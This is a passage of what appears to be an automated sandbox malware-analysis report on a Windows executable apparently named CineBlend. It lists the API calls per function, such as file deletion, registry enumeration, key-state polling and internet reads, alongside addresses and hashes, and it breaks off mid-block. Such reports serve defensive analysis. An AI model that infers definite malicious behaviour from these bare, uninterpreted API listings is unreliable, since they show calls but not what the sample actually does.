                                          • Opcode Fuzzy Hash: ce9702be1816438bbb3837a867cf3f8e8769fbb1516e3de7f638146526967ade
                                          • Instruction Fuzzy Hash: D0E0863560262217D2211725AC18B9AA7A8DF93B12B060156FD80F3254EF60CD0180A9
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B85657,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B46610
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B46622
                                          • FreeLibrary.KERNEL32(00000000,?,?,00B85657,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B46635
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 145871493-1355242751
                                          • Opcode ID: 520b10bfd7e2955a9217924aaa5457112ca7985049abadd7c477d9eb92a20763
                                          • Instruction ID: fdb76f5b54244816b52c226568bb71eea7060b62841b8d564bc931b2f8b4633c
                                          • Opcode Fuzzy Hash: 520b10bfd7e2955a9217924aaa5457112ca7985049abadd7c477d9eb92a20763
                                          • Instruction Fuzzy Hash: DFD0123561353257823227256C28BCFAB58DE92B113060066B940B3154EF70CE41D599
                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB35C4
                                          • DeleteFileW.KERNEL32(?), ref: 00BB3646
                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BB365C
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB366D
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB367F
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: File$Delete$Copy
                                          • String ID:
                                          • API String ID: 3226157194-0
                                          • Opcode ID: e2e6ddf25c7dfe70fde9ec652467c17a6e92369587037013896b672477d4ff24
                                          • Instruction ID: 258739feda5b1b0841e049f9745b29b0671e936f4a21244cbf8ecb31c9367e7e
                                          • Opcode Fuzzy Hash: e2e6ddf25c7dfe70fde9ec652467c17a6e92369587037013896b672477d4ff24
                                          • Instruction Fuzzy Hash: 49B14C72E00129ABDF15DBA4CC85EEEBBFDEF49710F0040E6F50AA7151EA749B448B61
                                          APIs
                                          • GetCurrentProcessId.KERNEL32 ref: 00BCAE87
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BCAE95
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BCAEC8
                                          • CloseHandle.KERNEL32(?), ref: 00BCB09D
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                          • String ID:
                                          • API String ID: 3488606520-0
                                          • Opcode ID: 6a4c3d6923506b137e84a70718c0207b5acebb6ad68608f0ca4af58607a31fd5
                                          • Instruction ID: 134e101fe4c5d3ce7697d56b97b3f6926705d6ab10c636f76c086764d29e3725
                                          • Opcode Fuzzy Hash: 6a4c3d6923506b137e84a70718c0207b5acebb6ad68608f0ca4af58607a31fd5
                                          • Instruction Fuzzy Hash: 15A1A271A04301AFE720DF28C886F2AB7E5EF44714F14889DF5A99B292DB71ED41CB91
                                          APIs
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE46D0), ref: 00B7BF11
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00C1221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00B7BF89
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00C12270,000000FF,?,0000003F,00000000,?), ref: 00B7BFB6
                                          • _free.LIBCMT ref: 00B7BEFF
                                            • Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
                                            • Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60
                                          • _free.LIBCMT ref: 00B7C0CB
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                          • String ID:
                                          • API String ID: 1286116820-0
                                          • Opcode ID: 8bb9dfee88d04dac8662cdc177e239c837ccb2e69f13780d745caac4acb0ab09
                                          • Instruction ID: af0d8bb7ee41b8df9ac8f06b9150ef741042d886769ff4879c021f2d6ec18160
                                          • Opcode Fuzzy Hash: 8bb9dfee88d04dac8662cdc177e239c837ccb2e69f13780d745caac4acb0ab09
                                          • Instruction Fuzzy Hash: D451E871900205AFCB10EF65DC81FAEB7F8EF41720B1082EAE5789B191EB709D519F50
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                            • Part of subcall function 00BCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCC10E,?,?), ref: 00BCD415
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD451
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4C8
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4FE
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BCC505
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BCC560
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BCC5C3
                                          • RegCloseKey.ADVAPI32(?,?), ref: 00BCC606
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00BCC613
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                          • String ID:
                                          • API String ID: 826366716-0
                                          • Opcode ID: 8b3181dd3404ff4bc54a93bd08946210c327ef09aeb32cd0189a31a05a0d58b1
                                          • Instruction ID: 76bcf0e28f336847203707b9b644c07eae0f43019532af8007d5083b1bb6b97c
                                          • Opcode Fuzzy Hash: 8b3181dd3404ff4bc54a93bd08946210c327ef09aeb32cd0189a31a05a0d58b1
                                          • Instruction Fuzzy Hash: B2617F71208241AFD714DF14C891F2ABBE5FF94308F5485ADF4998B2A2DB31ED46CB92
                                          APIs
                                            • Part of subcall function 00BAE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BAD7CD,?), ref: 00BAE714
                                            • Part of subcall function 00BAE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BAD7CD,?), ref: 00BAE72D
                                            • Part of subcall function 00BAEAB0: GetFileAttributesW.KERNEL32(?,00BAD840), ref: 00BAEAB1
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00BAED8A
                                          • MoveFileW.KERNEL32(?,?), ref: 00BAEDC3
                                          • _wcslen.LIBCMT ref: 00BAEF02
                                          • _wcslen.LIBCMT ref: 00BAEF1A
                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00BAEF67
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                          • String ID:
                                          • API String ID: 3183298772-0
                                          • Opcode ID: ba4bf772319ef991d1d70903e6c3838cf4ab23f1c5b91cfd09a28ac89539d6d6
                                          • Instruction ID: 325affc68150169e23444b69dbc06d47740ff2597e78d5ade77a1f224b6588bd
                                          • Opcode Fuzzy Hash: ba4bf772319ef991d1d70903e6c3838cf4ab23f1c5b91cfd09a28ac89539d6d6
                                          • Instruction Fuzzy Hash: FC515DB250C3859BC724EB94D8919DBB3ECEF95300F00096EF299D3151EF35E6888B66
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00BA9534
                                          • VariantClear.OLEAUT32 ref: 00BA95A5
                                          • VariantClear.OLEAUT32 ref: 00BA9604
                                          • VariantClear.OLEAUT32(?), ref: 00BA9677
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BA96A2
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType
                                          • String ID:
                                          • API String ID: 4136290138-0
                                          • Opcode ID: c846cf55a1bb235e38c920fa1fcf2a463f4f66bcf1b58cdf1722c3bd5a8fd574
                                          • Instruction ID: 3e39d5569cb3fccb008035f792c7c129c6d9e9ee04aed61350aed4013cf2154e
                                          • Opcode Fuzzy Hash: c846cf55a1bb235e38c920fa1fcf2a463f4f66bcf1b58cdf1722c3bd5a8fd574
                                          • Instruction Fuzzy Hash: 365147B5A04219EFCB14CF68C894EAAB7F8FF89310B158559E909EB314E730E911CF90
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BB95F3
                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00BB961F
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BB9677
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BB969C
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BB96A4
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String
                                          • String ID:
                                          • API String ID: 2832842796-0
                                          • Opcode ID: c380c2bfd18d3c4ddb57ac63472217788d8941e41affb3bed655e5b462c6cbbf
                                          • Instruction ID: 7e6665c31a38dd81786c9528d19ef28241098c6b3c0112e187f3c140b425a0b5
                                          • Opcode Fuzzy Hash: c380c2bfd18d3c4ddb57ac63472217788d8941e41affb3bed655e5b462c6cbbf
                                          • Instruction Fuzzy Hash: C4514E35A002199FCB05DF55C881AAEBBF5FF49314F048098E94AAB362DB75ED41DB90
                                          APIs
                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00BC999D
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00BC9A2D
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00BC9A49
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00BC9A8F
                                          • FreeLibrary.KERNEL32(00000000), ref: 00BC9AAF
                                            • Part of subcall function 00B5F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00BB1A02,?,75B8E610), ref: 00B5F9F1
                                            • Part of subcall function 00B5F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00BA0354,00000000,00000000,?,?,00BB1A02,?,75B8E610,?,00BA0354), ref: 00B5FA18
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                          • String ID:
                                          • API String ID: 666041331-0
                                          • Opcode ID: 723e033a2c82cbe1b54fb0807c33f71c13bf11979c2e484eefbf406dab271961
                                          • Instruction ID: 48d16f40ab24106950786f9ee9bf876b9ef6df268c1612302cbdd119392c17eb
                                          • Opcode Fuzzy Hash: 723e033a2c82cbe1b54fb0807c33f71c13bf11979c2e484eefbf406dab271961
                                          • Instruction Fuzzy Hash: 90513A35601245DFDB01DF68C494EA9BBF0FF09314B1480E9E856AB762DB31ED86CB91
                                          APIs
                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00BD766B
                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00BD7682
                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00BD76AB
                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00BBB5BE,00000000,00000000), ref: 00BD76D0
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00BD76FF
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$Long$MessageSendShow
                                          • String ID:
                                          • API String ID: 3688381893-0
                                          • Opcode ID: 8dfc2002b300939ff28154d08319cb9b1aa7774379034a3cab7d711c97e3e53e
                                          • Instruction ID: 36c87595d8abc85e2085761338b5ae1a396ad360753b7992ea50aceb0f06ee49
                                          • Opcode Fuzzy Hash: 8dfc2002b300939ff28154d08319cb9b1aa7774379034a3cab7d711c97e3e53e
                                          • Instruction Fuzzy Hash: 9C41B135A88504AFD725CF6CCC98FE9FBE5EB06350F1502A6E859A73A0FA70ED10D650
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 97b6e949a07192011c9d20f735668f27b55b334f8bcba0b4f12f6f72c4bb4460
                                          • Instruction ID: 5b7d76da86c8fabce6b84c2e34b98d9a9bc3e23bff13026cb1f6df4b7fd2979c
                                          • Opcode Fuzzy Hash: 97b6e949a07192011c9d20f735668f27b55b334f8bcba0b4f12f6f72c4bb4460
                                          • Instruction Fuzzy Hash: 8741B236A002009FDB24DF78C881A5EB7F5EF89714F1585E9E62AEB351D731AD01CB80
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00B419E1
                                          • ScreenToClient.USER32(00000000,?), ref: 00B419FE
                                          • GetAsyncKeyState.USER32(00000001), ref: 00B41A23
                                          • GetAsyncKeyState.USER32(00000002), ref: 00B41A3D
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 149706d21831ac67b61a559d288011a5ef0830894be0054ddf85de34f3e6f0d1
                                          • Instruction ID: 29729e5edadff1b504dc6b0360a8575a9a1535328324057ceef5668af73b07cc
                                          • Opcode Fuzzy Hash: 149706d21831ac67b61a559d288011a5ef0830894be0054ddf85de34f3e6f0d1
                                          • Instruction Fuzzy Hash: A2417175A0410AFFDF05AF68C888AEDF7F4FF05B24F208656E469A22A0D7345E90DB51
                                          APIs
                                          • GetInputState.USER32 ref: 00BB4310
                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00BB4367
                                          • TranslateMessage.USER32(?), ref: 00BB4390
                                          • DispatchMessageW.USER32(?), ref: 00BB439A
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB43AB
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                          • String ID:
                                          • API String ID: 2256411358-0
                                          • Opcode ID: 4c46288902816898d1d5ae3f94594a172ff8ff1d77eaeb17bc3aafb5cdd2d814
                                          • Instruction ID: 0962805831a36899ed194f9c2499fce847890c28437dc739c94d272935f92de5
                                          • Opcode Fuzzy Hash: 4c46288902816898d1d5ae3f94594a172ff8ff1d77eaeb17bc3aafb5cdd2d814
                                          • Instruction Fuzzy Hash: BE318370504346DFEB298B74D849FFA7BE8FB01304F0845B9D4A2C21A2E7E49959CB25
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00BA2262
                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 00BA230E
                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00BA2316
                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00BA2327
                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00BA232F
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: 935f8610a46fdc4497f602589e06b60e85a69f29e3f988a9f24ecbb419a04871
                                          • Instruction ID: c2c09f557277c4ca55a5d6a08dc7dfb4eaf355f81222b876a4954c1e32b60783
                                          • Opcode Fuzzy Hash: 935f8610a46fdc4497f602589e06b60e85a69f29e3f988a9f24ecbb419a04871
                                          • Instruction Fuzzy Hash: DC31CD71904219EFDB04CFACCD89BDE7BB5EB05315F004269FA21A72D0D770A944CB90
                                          APIs
                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00BBCC63,00000000), ref: 00BBD97D
                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00BBD9B4
                                          • GetLastError.KERNEL32(?,00000000,?,?,?,00BBCC63,00000000), ref: 00BBD9F9
                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00BBCC63,00000000), ref: 00BBDA0D
                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00BBCC63,00000000), ref: 00BBDA37
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                          • String ID:
                                          • API String ID: 3191363074-0
                                          • Opcode ID: bf2cda6c38896dec6ac54b4c58dde06d568a187c8d1b05173ccd510e1d4a3016
                                          • Instruction ID: bca3eba1e179e7eae943b7df4149c6273e2002f5514460492022ddc54898984a
                                          • Opcode Fuzzy Hash: bf2cda6c38896dec6ac54b4c58dde06d568a187c8d1b05173ccd510e1d4a3016
                                          • Instruction Fuzzy Hash: 13315071504605EFDB24DFA5D894ABBB7F8EB04350B1044AEF586D3150EB78ED40DB60
                                          APIs
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BD61E4
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BD623C
                                          • _wcslen.LIBCMT ref: 00BD624E
                                          • _wcslen.LIBCMT ref: 00BD6259
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD62B5
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
